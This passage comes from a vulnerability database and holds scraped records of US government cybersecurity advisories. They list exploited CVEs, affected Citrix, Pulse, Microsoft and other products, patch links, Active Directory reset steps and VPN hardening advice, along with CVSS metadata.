\n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | \n\n * Citrix Application Delivery Controller\n * Citrix Gateway\n * Citrix SDWAN WANOP\n| \n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0 ](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n * [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) | \n\n * Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)\n| \n\n * [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | \n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15\n * Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n| \n\n * [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n[CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) | \n\n * MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0 \n * Sentry versions 9.7.2 and earlier, and 9.8.0; \n * Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier\n| \n\n * [MobileIron Blog: MobileIron Security Updates Available](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>) \n[CVE-2020-1631](<https://nvd.nist.gov/vuln/detail/CVE-2020-1631>) | \n\n * Junos OS 12.3, 12.3X48, 14.1X53, 15.1, 15.1X49, 15.1X53, 17.2, 17.3, 17.4, 18.1, 18.2, 18.3, 18.4, 19.1, 19.2, 19.3, 19.4, 20.1\n| \n\n * [Juniper Security Advisory JSA11021](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11021>) \n[CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>) | \n\n * PAN-OS 9.1 versions earlier than PAN-OS 9.1.3; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9; PAN-OS 8.1 versions earlier than PAN-OS 8.1.15, and all versions of PAN-OS 8.0 (EOL)\n| \n\n * [Palo Alto Networks Security Advisory for CVE-2020-2021](<https://security.paloaltonetworks.com/CVE-2020-2021>) \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | \n\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2016\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n * Windows Server, version 2004 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) \n \n### Comprehensive Account Resets\n\nIf there is an observation of [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) Netlogon activity or other indications of valid credential abuse detected, it should be assumed the APT actors have compromised AD administrative accounts, the AD forest should not be fully trusted, and, therefore, a new forest should be deployed. Existing hosts from the old compromised forest cannot be migrated in without being rebuilt and rejoined to the new domain, but migration may be done through \u201ccreative destruction,\u201d wherein as endpoints in the legacy forest are decommissioned, new ones can be built in the new forest. This will need to be completed on on-premise as well as Azure-hosted AD instances.\n\nNote that fully resetting an AD forest is difficult and complex; it is best done with the assistance of personnel who have successfully completed the task previously.\n\nIt is critical to perform a full password reset on all user and computer accounts in the AD forest. Use the following steps as a guide.\n\n 1. Create a temporary administrator account, and use this account only for all administrative actions\n 2. Reset the Kerberos Ticket Granting Ticket (`krbtgt`) password [[4](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)]; this must be completed before any additional actions (a second reset will take place in step 5)\n 3. Wait for the krbtgt reset to propagate to all domain controllers (time may vary)\n 4. Reset all account passwords (passwords should be 15 characters or more and randomly assigned): \n\n 1. User accounts (forced reset with no legacy password reuse)\n 2. Local accounts on hosts (including local accounts not covered by Local Administrator Password Solution [LAPS])\n 3. Service accounts\n 4. Directory Services Restore Mode (DSRM) account\n 5. Domain Controller machine account\n 6. Application passwords\n 5. Reset the `krbtgt` password again\n 6. Wait for the `krbtgt` reset to propagate to all domain controllers (time may vary)\n 7. Reboot domain controllers\n 8. Reboot all endpoints\n\nThe following accounts should be reset:\n\n * AD Kerberos Authentication Master (2x)\n * All Active Directory Accounts\n * All Active Directory Admin Accounts\n * All Active Directory Service Accounts\n * All Active Directory User Accounts\n * DSRM Account on Domain Controllers\n * Non-AD Privileged Application Accounts\n * Non-AD Unprivileged Application Accounts\n * Non-Windows Privileged Accounts\n * Non-Windows User Accounts\n * Windows Computer Accounts\n * Windows Local Admin\n\n### CVE-2020-1472\n\nTo secure your organization\u2019s Netlogon channel connections:\n\n * **Update all Domain Controllers and Read Only Domain Controllers**. On August 11, 2020, Microsoft released [software updates](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) to mitigate CVE-2020-1472. Applying this update to domain controllers is currently the only mitigation to this vulnerability (aside from removing affected domain controllers from the network).\n * **Monitor for new events, and address non-compliant devices** that are using vulnerable Netlogon secure channel connections.\n * **Block public access to potentially vulnerable ports**, such as 445 (Server Message Block [SMB]) and 135 (Remote Procedure Call [RPC]).\n\nTo protect your organization against this CVE, follow [advice from Microsoft](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>), including:\n\n * Update your domain controllers with an update released August 11, 2020, or later.\n * Find which devices are making vulnerable connections by monitoring event logs.\n * Address non-compliant devices making vulnerable connections.\n * Enable enforcement mode to address [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) in your environment.\n\n### VPN Vulnerabilities\n\nImplement the following recommendations to secure your organization\u2019s VPNs:\n\n * **Update VPNs, network infrastructure devices, and devices **being used to remote into work environments with the latest software patches and security configurations. See CISA Tips [Understanding Patches and Software Updates](<https://us-cert.cisa.gov/ncas/tips/ST04-006>) and [Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>). Wherever possible, enable automatic updates. See table 1 for patch information on VPN-related CVEs mentioned in this report.\n * **Implement multi-factor authentication (MFA) on all VPN connections to increase security**. Physical security tokens are the most secure form of MFA, followed by authenticator app-based MFA. SMS and email-based MFA should only be used when no other forms are available. If MFA is not implemented, require teleworkers to use strong passwords. See CISA Tips [Choosing and Protecting Passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) and [Supplementing Passwords](<https://us-cert.cisa.gov/ncas/tips/ST05-012>) for more information.\n\nDiscontinue unused VPN servers. Reduce your organization\u2019s attack surface by discontinuing unused VPN servers, which may act as a point of entry for attackers. To protect your organization against VPN vulnerabilities:\n\n * **Audit **configuration and patch management programs.\n * **Monitor** network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., Secure Shell [SSH], SMB, RDP).\n * **Implement **MFA, especially for privileged accounts.\n * **Use **separate administrative accounts on separate administration workstations.\n * **Keep **[software up to date](<https://us-cert.cisa.gov/ncas/tips/ST04-006>). Enable automatic updates, if available. \n\n### How to uncover and mitigate malicious activity\n\n * **Collect and remove** for further analysis: \n * Relevant artifacts, logs, and data.\n * **Implement **mitigation steps that avoid tipping off the adversary that their presence in the network has been discovered.\n * **Consider **soliciting incident response support from a third-party IT security organization to: \n * Provide subject matter expertise and technical support to the incident response.\n * Ensure that the actor is eradicated from the network.\n * Avoid residual issues that could result in follow-up compromises once the incident is closed.\n\n### Resources\n\n * [CISA VPN-Related Guidance](<https://www.cisa.gov/vpn-related-guidance>)\n * CISA Infographic: [Risk Vulnerability And Assessment (RVA) Mapped to the MITRE ATT&CK FRAMEWORK](<https://www.cisa.gov/sites/default/files/publications/Risk and Vulnerability Assessment %28RVA%29 Mapped to the MITRE ATT%26amp%3BCK Framework Infographic_v6-100620_ 508.pdf>)\n * National Security Agency InfoSheet: [Configuring IPsec Virtual Private Networks](<https://media.defense.gov/2020/Jul/02/2002355501/-1/-1/0/CONFIGURING_IPSEC_VIRTUAL_PRIVATE_NETWORKS_2020_07_01_FINAL_RELEASE.PDF>)\n * CISA Joint Advisory: [AA20-245A: Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>)\n * CISA Activity Alert: [AA20-073A: Enterprise VPN Security](<https://us-cert.cisa.gov/ncas/alerts/aa20-073a>)\n * CISA Activity Alert: [AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)\n * CISA Activity Alert: [AA20-010A: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)\n * **Cybersecurity Alerts and Advisories**: Subscriptions to [CISA Alerts](<https://public.govdelivery.com/accounts/USDHSUSCERT/subscriber/new>) and [MS-ISAC Advisories](<https://learn.cisecurity.org/ms-isac-subscription>)\n\n### Contact Information\n\nRecipients of this report are encouraged to contribute any additional information that they may have related to this threat.\n\nFor any questions related to this report or to report an intrusion and request resources for incident response or technical assistance, please contact:\n\n * CISA (888-282-0870 or [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>)), or\n * The FBI through the FBI Cyber Division (855-292-3937 or [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>)) or a [local field office](<https://www.fbi.gov/contact-us/field-offices/field-offices>)\n\n**_DISCLAIMER_**\n\n_This information is provided \"as is\" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information._\n\n_The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government._\n\n### References\n\n[[1] Fortinet Advisory: FG-IR-18-384 ](<https://www.fortiguard.com/psirt/FG-IR-18-384>)\n\n[[2] MobileIron Blog: MobileIron Security Updates Available](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>)\n\n[[3] Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)\n\n[[4] Microsoft: AD Forest Recovery - Resetting the krbtgt password](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)\n\n### Revisions\n\nOctober 9, 2020: Initial Version|October 11, 2020: Updated Summary|October 12, 2020: Added Additional Links\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-1631", "CVE-2020-2021", "CVE-2020-5902"], "modified": "2020-10-24T12:00:00", "id": "AA20-283A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:35:47", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the broader U.S. Government are providing this technical guidance to advise IT security professionals at public and private sector organizations to place an increased priority on patching the most commonly known vulnerabilities exploited by sophisticated foreign cyber actors.\n\nThis alert provides details on vulnerabilities routinely exploited by foreign cyber actors\u2014primarily Common Vulnerabilities and Exposures (CVEs)[[1]](<https://cve.mitre.org/cve/ >)\u2014to help organizations reduce the risk of these foreign threats.\n\nForeign cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations. Exploitation of these vulnerabilities often requires fewer resources as compared with zero-day exploits for which no patches are available.\n\nThe public and private sectors could degrade some foreign cyber threats to U.S. interests through an increased effort to patch their systems and implement programs to keep system patching up to date. A concerted campaign to patch these vulnerabilities would introduce friction into foreign adversaries\u2019 operational tradecraft and force them to develop or acquire exploits that are more costly and less widely effective. A concerted patching campaign would also bolster network security by focusing scarce defensive resources on the observed activities of foreign adversaries.\n\nFor indicators of compromise (IOCs) and additional guidance associated with the CVEs in this Alert, see the each entry within the Mitigations section below. Click here for a PDF version of this report.\n\n### Technical Details\n\n## Top 10 Most Exploited Vulnerabilities 2016\u20132019\n\nU.S. Government reporting has identified the top 10 most exploited vulnerabilities by state, nonstate, and unattributed cyber actors from 2016 to 2019 as follows: CVE-2017-11882, CVE-2017-0199, CVE-2017-5638, CVE-2012-0158, CVE-2019-0604, CVE-2017-0143, CVE-2018-4878, CVE-2017-8759, CVE-2015-1641, and CVE-2018-7600.\n\n * According to U.S. Government technical analysis, malicious cyber actors most often exploited vulnerabilities in Microsoft\u2019s Object Linking and Embedding (OLE) technology. OLE allows documents to contain embedded content from other applications such as spreadsheets. After OLE the second-most-reported vulnerable technology was a widespread Web framework known as Apache Struts.\n * Of the top 10, the three vulnerabilities used most frequently across state-sponsored cyber actors from China, Iran, North Korea, and Russia are CVE-2017-11882, CVE-2017-0199, and CVE-2012-0158. All three of these vulnerabilities are related to Microsoft\u2019s OLE technology.\n * As of December 2019, Chinese state cyber actors were frequently exploiting the same vulnerability\u2014CVE-2012-0158\u2014that the U.S. Government publicly assessed in 2015 was the most used in their cyber operations.[[2]](<https://www.us-cert.gov/ncas/alerts/TA15-119A>) This trend suggests that organizations have not yet widely implemented patches for this vulnerability and that Chinese state cyber actors may continue to incorporate dated flaws into their operational tradecraft as long as they remain effective.\n * Deploying patches often requires IT security professionals to balance the need to mitigate vulnerabilities with the need for keeping systems running and ensuring installed patches are compatible with other software. This can require a significant investment of effort, particularly when mitigating multiple flaws at the same time.\n * A U.S. industry study released in early 2019 similarly discovered that the flaws malicious cyber actors exploited the most consistently were in Microsoft and Adobe Flash products, probably because of the widespread use of these technologies.[[3]](<https://www.recordedfuture.com/top-vulnerabilities-2019/>) Four of the industry study\u2019s top 10 most exploited flaws also appear on this Alert\u2019s list, highlighting how U.S. Government and private-sector data sources may complement each other to enhance security.\n\n## Vulnerabilities Exploited in 2020\n\nIn addition to the top 10 vulnerabilities from 2016 to 2019 listed above, the U.S. Government has reported that the following vulnerabilities are being routinely exploited by sophisticated foreign cyber actors in 2020:\n\n * Malicious cyber actors are increasingly targeting unpatched Virtual Private Network vulnerabilities. \n * An arbitrary code execution vulnerability in Citrix VPN appliances, known as CVE-2019-19781, has been detected in exploits in the wild.\n * An arbitrary file reading vulnerability in Pulse Secure VPN servers, known as CVE-2019-11510, continues to be an attractive target for malicious actors.\n * March 2020 brought an abrupt shift to work-from-home that necessitated, for many organizations, rapid deployment of cloud collaboration services, such as Microsoft Office 365 (O365). Malicious cyber actors are targeting organizations whose hasty deployment of Microsoft O365 may have led to oversights in security configurations and vulnerable to attack.\n * Cybersecurity weaknesses\u2014such as poor employee education on social engineering attacks and a lack of system recovery and contingency plans\u2014have continued to make organizations susceptible to ransomware attacks in 2020.\n\n### Mitigations\n\nThis Alert provides mitigations for each of the top vulnerabilities identified above. In addition to the mitigations listed below, CISA, FBI, and the broader U.S. Government recommend that organizations transition away from any end-of-life software.\n\n## Mitigations for the Top 10 Most Exploited Vulnerabilities 2016\u20132019\n\n**Note:** The lists of associated malware corresponding to each CVE below is not meant to be exhaustive but instead is intended to identify a malware family commonly associated with exploiting the CVE. \n\n_**CVE-2017-11882**_\n\n * Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016 Products\n * Associated Malware: Loki, FormBook, Pony/FAREIT\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-11882>\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133e>\n\n_**CVE-2017-0199**_\n\n * Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1\n * Associated Malware: FINSPY, LATENTBOT, Dridex\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-0199>\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133g>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133h>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133p>\n\n_**CVE-2017-5638**_\n\n * Vulnerable Products: Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1\n * Associated Malware: JexBoss\n * Mitigation: Upgrade to Struts 2.3.32 or Struts 2.5.10.1\n * More Detail: \n * <https://www.us-cert.gov/ncas/analysis-reports/AR18-312A>\n * <https://nvd.nist.gov/vuln/detail/CVE-2017-5638>\n\n_**CVE-2012-0158**_\n\n * Vulnerable Products: Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0\n * Associated Malware: Dridex\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: \n * <https://www.us-cert.gov/ncas/alerts/aa19-339a>\n * <https://nvd.nist.gov/vuln/detail/CVE-2012-0158>\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133i>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133j>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133k>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133l>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133n>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133o>\n\n_**CVE-2019-0604**_\n\n * Vulnerable Products: Microsoft SharePoint\n * Associated Malware: China Chopper\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2019-0604>\n\n_**CVE-2017-0143**_\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-0143>\n\n_**CVE-2018-4878**_\n\n * Vulnerable Products: Adobe Flash Player before 28.0.0.161\n * Associated Malware: DOGCALL\n * Mitigation: Update Adobe Flash Player installation to the latest version\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2018-4878>\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133d>\n\n**_CVE-2017-8759_**\n\n * Vulnerable Products: Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7\n * Associated Malware: FINSPY, FinFisher, WingBird\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-8759>\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133f>\n\n_**CVE-2015-1641**_\n\n * Vulnerable Products: Microsoft Word 2007 SP3, Office 2010 SP2, Word 2010 SP2, Word 2013 SP1, Word 2013 RT SP1, Word for Mac 2011, Office Compatibility Pack SP3, Word Automation Services on SharePoint Server 2010 SP2 and 2013 SP1, and Office Web Apps Server 2010 SP2 and 2013 SP1\n * Associated Malware: Toshliph, UWarrior\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2015-1641>\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133m>\n\n_**CVE-2018-7600**_\n\n * Vulnerable Products: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1\n * Associated Malware: Kitty\n * Mitigation: Upgrade to the most recent version of Drupal 7 or 8 core.\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2018-7600>\n\n## Mitigations for Vulnerabilities Exploited in 2020\n\n**_CVE-2019-11510_**\n\n * Vulnerable Products: Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15 and Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n * Mitigation: Update affected Pulse Secure devices with the latest security patches.\n * More Detail: \n * <https://www.us-cert.gov/ncas/alerts/aa20-107a>\n * <https://nvd.nist.gov/vuln/detail/CVE-2019-11510>\n * <https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>\n\n_**CVE-2019-19781**_\n\n * Vulnerable Products: Citrix Application Delivery Controller, Citrix Gateway, and Citrix SDWAN WANOP\n * Mitigation: Update affected Citrix devices with the latest security patches\n * More Detail: \n * <https://www.us-cert.gov/ncas/alerts/aa20-020a>\n * <https://www.us-cert.gov/ncas/alerts/aa20-031a>\n * <https://www.fireeye.com/blog/products-and-services/2020/01/fireeye-and-citrix-tool-scans-for-iocs-related-to-vulnerability.html>\n * <https://nvd.nist.gov/vuln/detail/CVE-2019-19781>\n * <https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>\n\n_**Oversights in Microsoft O365 Security Configurations**_\n\n * Vulnerable Products: Microsoft O365\n * Mitigation: Follow Microsoft O365 security recommendations\n * More Detail: <https://www.us-cert.gov/ncas/alerts/aa20-120a>\n\n**_Organizational Cybersecurity Weaknesses_**\n\n * Vulnerable Products: Systems, networks, and data\n * Mitigation: Follow cybersecurity best practices\n * More Detail: <https://www.cisa.gov/cyber-essentials>\n\n## CISA\u2019s Free Cybersecurity Services\n\nAdversaries use known vulnerabilities and phishing attacks to compromise the security of organizations. CISA offers several free scanning and testing services to help organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors.\n\n**Cyber Hygiene: Vulnerability Scanning** helps secure your internet-facing systems from weak configuration and known vulnerabilities. It also encourages organizations to adopt modern security best practices. CISA performs regular network and vulnerability scans and delivers a weekly report for your action. Once initiated, this service is mostly automated and requires little direct interaction. After CISA receives the required paperwork for Cyber Hygiene, our scans will start within 72 hours and you\u2019ll begin receiving reports within two weeks.\n\n**Web Application Service** checks your publicly accessible web sites for potential bugs and weak configurations. It provides a \u201csnapshot\u201d of your publicly accessible web applications and also checks functionality and performance in your application. \nIf your organization would like these services or want more information about other useful services, please email [vulnerability_info@cisa.dhs.gov](<mailto:vulnerability_info@cisa.dhs.gov>).\n\n## CISA Online Resources\n\nThe Patch Factory: CISA infographic depicting the global infrastructure for managing vulnerabilities.\n\n[CISA Alert: (AA20-120A) Microsoft Office 365 Security Recommendations](<https://www.us-cert.gov/ncas/alerts/aa20-120a>): recommendations for organizations to review and ensure their O365 environment is configured to protect, detect, and respond against would-be attackers.\n\n[CISA\u2019s Cyber Essentials](<https://www.cisa.gov/cyber-essentials>): a guide for leaders of small businesses as well as leaders of small and local government agencies to develop an actionable understanding of where to start implementing organizational cybersecurity practices.\n\n### Contact Information\n\nIf you have any further questions related to this Joint Alert, please contact the FBI at either your local Cyber Task Force or FBI CyWatch.\n\n * You can find your local field offices at <https://www.fbi.gov/contact-us/field>\n * CyWatch can be contacted through e-mail at [cywatch@fbi.gov](<mailto:cywatch@fbi.gov>) or by phone at 1-855-292-3937\n\nTo request incident response resources or technical assistance related to these threats, contact CISA at [CISAServiceDesk@cisa.dhs.gov](<mailto:CISAServiceDesk@cisa.dhs.gov>).\n\n### References\n\n[[1] Cybersecurity Vulnerabilities and Exposures (CVE) list](<https://cve.mitre.org/cve/>)\n\n[[2] CISA Alert (TA15-119A). Top 30 Targeted High Risk Vulnerabilities. (2016, September 29)](<https://www.us-cert.gov/ncas/alerts/TA15-119A>)\n\n[[3] Recorded Future. 2019 Vulnerability Report: Cybercriminals Continue to Target Microsoft Products. (2020, February 4)](<https://www.recordedfuture.com/top-vulnerabilities-2019/>)\n\n### Revisions\n\nMay 12, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-05-12T12:00:00", "type": "ics", "title": "Top 10 Routinely Exploited Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2015-1641", "CVE-2017-0143", "CVE-2017-0199", "CVE-2017-11882", "CVE-2017-5638", "CVE-2017-8759", "CVE-2018-4878", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781"], "modified": "2020-05-12T12:00:00", "id": "AA20-133A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-133a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:26:44", "description": "### Summary\n\nBest Practices \n\u2022 Apply patches as soon as possible \n\u2022 Disable unnecessary ports and protocols \n\u2022 Replace end-of-life infrastructure \n\u2022 Implement a centralized patch management system\n\nThis joint Cybersecurity Advisory describes the ways in which People\u2019s Republic of China (PRC) state-sponsored cyber actors continue to exploit publicly known vulnerabilities in order to establish a broad network of compromised infrastructure. These actors use the network to exploit a wide variety of targets worldwide, including public and private sector organizations. The advisory details the targeting and compromise of major telecommunications companies and network service providers and the top vulnerabilities\u2014primarily Common Vulnerabilities and Exposures (CVEs)\u2014associated with network devices routinely exploited by the cyber actors since 2020.\n\nThis joint Cybersecurity Advisory was coauthored by the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI). It builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal, and territorial (SLTT) government; critical infrastructure (CI), including the Defense Industrial Base (DIB); and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).\n\nEntities can mitigate the vulnerabilities listed in this advisory by applying the available patches to their systems, replacing end-of-life infrastructure, and implementing a centralized patch management program.\n\nNSA, CISA, and the FBI urge U.S. and allied governments, CI, and 